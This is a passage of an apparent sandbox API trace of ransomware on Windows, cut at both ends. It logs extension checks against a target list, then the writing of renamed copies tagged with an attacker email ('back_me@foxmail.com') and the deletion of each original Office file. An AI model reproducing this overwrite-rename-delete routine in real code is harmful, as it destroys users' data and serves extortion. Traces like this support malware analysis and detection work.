lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.522] lstrlenW (lpString=".zip") returned 4 [0039.522] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.522] lstrlenW (lpString=".rar") returned 4 [0039.522] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.522] lstrlenW (lpString=".bz2") returned 4 [0039.522] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.522] lstrlenW (lpString=".7z") returned 3 [0039.522] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.522] lstrlenW (lpString=".dbf") returned 4 [0039.522] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.522] lstrlenW (lpString=".1cd") returned 4 [0039.522] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.522] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.522] lstrlenW (lpString=".jpg") returned 4 [0039.522] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.523] lstrlenW (lpString=".doc") returned 4 [0039.523] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString=".docx") returned 5 [0039.523] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0039.523] lstrlenW (lpString=".pdf") returned 4 [0039.523] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString=".xls") returned 4 [0039.523] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString=".xlsx") returned 5 [0039.523] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0039.523] lstrlenW (lpString=".ppt") returned 4 [0039.523] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.523] lstrlenW (lpString=".zip") returned 4 [0039.523] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.523] lstrlenW (lpString=".rar") returned 4 [0039.523] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString=".bz2") returned 4 [0039.523] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString=".7z") returned 3 [0039.523] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.523] lstrlenW (lpString=".dbf") returned 4 [0039.523] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.523] lstrlenW (lpString=".1cd") returned 4 [0039.523] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.523] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml") returned 61 [0039.523] lstrlenW (lpString=".jpg") returned 4 [0039.524] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.524] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0039.524] lstrlenW (lpString="ipsesp.xml") returned 10 [0039.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.018] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=3024) returned 1 [0040.018] CloseHandle (hObject=0x1bc) returned 1 [0040.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml")) returned 0x20 [0040.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.018] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0040.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.019] lstrlenW (lpString=".doc") returned 4 [0040.019] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0040.019] lstrlenW (lpString=".docx") returned 5 [0040.019] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0040.019] lstrlenW (lpString=".pdf") returned 4 [0040.019] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0040.019] lstrlenW (lpString=".xls") returned 4 [0040.019] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0040.019] lstrlenW (lpString=".xlsx") returned 5 [0040.019] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0040.019] lstrlenW (lpString=".ppt") returned 4 [0040.019] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0040.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.019] lstrlenW (lpString=".zip") returned 4 [0040.019] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0040.019] lstrlenW (lpString=".rar") returned 4 [0040.019] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0040.019] lstrlenW (lpString=".bz2") returned 4 [0040.019] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0040.019] lstrlenW (lpString=".7z") returned 3 [0040.019] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0040.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.019] lstrlenW (lpString=".dbf") returned 4 [0040.019] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0040.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.019] lstrlenW (lpString=".1cd") returned 4 [0040.019] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0040.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.019] lstrlenW (lpString=".jpg") returned 4 [0040.019] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.020] lstrlenW (lpString=".doc") returned 4 [0040.020] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString=".docx") returned 5 [0040.020] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0040.020] lstrlenW (lpString=".pdf") returned 4 [0040.020] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString=".xls") returned 4 [0040.020] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString=".xlsx") returned 5 [0040.020] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0040.020] lstrlenW (lpString=".ppt") returned 4 [0040.020] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.020] lstrlenW (lpString=".zip") returned 4 [0040.020] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0040.020] lstrlenW (lpString=".rar") returned 4 [0040.020] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString=".bz2") returned 4 [0040.020] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString=".7z") returned 3 [0040.020] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0040.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.020] lstrlenW (lpString=".dbf") returned 4 [0040.020] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.020] lstrlenW (lpString=".1cd") returned 4 [0040.020] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0040.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0040.020] lstrlenW (lpString=".jpg") returned 4 [0040.020] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0040.021] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.021] lstrlenW (lpString="AccessMUISet.XML") returned 16 [0040.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.217] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=819) returned 1 [0040.217] CloseHandle (hObject=0x1b0) returned 1 [0040.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 0x20 [0040.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.217] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.218] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.218] GetLastError () returned 0x0 [0040.218] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x333, lpOverlapped=0x0) returned 1 [0040.220] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x340, lpOverlapped=0x0) returned 1 [0040.221] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.221] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0040.221] SetEndOfFile (hFile=0x1b4) returned 1 [0040.221] CloseHandle (hObject=0x1b4) returned 1 [0040.222] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.222] SetEndOfFile (hFile=0x1b0) returned 1 [0040.223] CloseHandle (hObject=0x1b0) returned 1 [0040.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.223] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 1 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.223] lstrlenW (lpString=".doc") returned 4 [0040.223] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".docx") returned 5 [0040.223] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0040.223] lstrlenW (lpString=".pdf") returned 4 [0040.223] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".xls") returned 4 [0040.223] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".xlsx") returned 5 [0040.224] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0040.224] lstrlenW (lpString=".ppt") returned 4 [0040.224] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.224] lstrlenW (lpString=".zip") returned 4 [0040.224] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.224] lstrlenW (lpString=".rar") returned 4 [0040.224] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".bz2") returned 4 [0040.224] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".7z") returned 3 [0040.224] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.224] lstrlenW (lpString=".dbf") returned 4 [0040.224] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.224] lstrlenW (lpString=".1cd") returned 4 [0040.224] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.224] lstrlenW (lpString=".jpg") returned 4 [0040.224] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.224] lstrlenW (lpString=".doc") returned 4 [0040.224] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".docx") returned 5 [0040.224] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0040.224] lstrlenW (lpString=".pdf") returned 4 [0040.224] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".xls") returned 4 [0040.224] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".xlsx") returned 5 [0040.225] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0040.225] lstrlenW (lpString=".ppt") returned 4 [0040.225] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.225] lstrlenW (lpString=".zip") returned 4 [0040.225] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.225] lstrlenW (lpString=".rar") returned 4 [0040.225] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.225] lstrlenW (lpString=".bz2") returned 4 [0040.225] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.225] lstrlenW (lpString=".7z") returned 3 [0040.225] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.225] lstrlenW (lpString=".dbf") returned 4 [0040.225] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.225] lstrlenW (lpString=".1cd") returned 4 [0040.225] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.225] lstrlenW (lpString=".jpg") returned 4 [0040.225] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.225] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.225] lstrlenW (lpString="ExcelMUI.XML") returned 12 [0040.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.226] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1565) returned 1 [0040.226] CloseHandle (hObject=0x1b0) returned 1 [0040.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 0x20 [0040.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.226] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.226] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.226] GetLastError () returned 0x0 [0040.227] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x61d, lpOverlapped=0x0) returned 1 [0040.228] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x620, lpOverlapped=0x0) returned 1 [0040.229] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.229] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.229] SetEndOfFile (hFile=0x1b4) returned 1 [0040.229] CloseHandle (hObject=0x1b4) returned 1 [0040.230] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.230] SetEndOfFile (hFile=0x1b0) returned 1 [0040.230] CloseHandle (hObject=0x1b0) returned 1 [0040.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.231] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 1 [0040.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.231] lstrlenW (lpString=".doc") returned 4 [0040.231] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.231] lstrlenW (lpString=".docx") returned 5 [0040.231] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.231] lstrlenW (lpString=".pdf") returned 4 [0040.231] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.231] lstrlenW (lpString=".xls") returned 4 [0040.231] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.231] lstrlenW (lpString=".xlsx") returned 5 [0040.231] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.231] lstrlenW (lpString=".ppt") returned 4 [0040.231] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.231] lstrlenW (lpString=".zip") returned 4 [0040.232] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.232] lstrlenW (lpString=".rar") returned 4 [0040.232] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString=".bz2") returned 4 [0040.232] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString=".7z") returned 3 [0040.232] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.232] lstrlenW (lpString=".dbf") returned 4 [0040.232] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.232] lstrlenW (lpString=".1cd") returned 4 [0040.232] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.232] lstrlenW (lpString=".jpg") returned 4 [0040.232] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.232] lstrlenW (lpString=".doc") returned 4 [0040.232] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString=".docx") returned 5 [0040.232] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.232] lstrlenW (lpString=".pdf") returned 4 [0040.232] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString=".xls") returned 4 [0040.232] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString=".xlsx") returned 5 [0040.232] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.232] lstrlenW (lpString=".ppt") returned 4 [0040.232] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.232] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104 [0040.232] lstrlenW (lpString=".zip") returned 4 [0040.232] lstrcmpiW (lpString1=".zip", 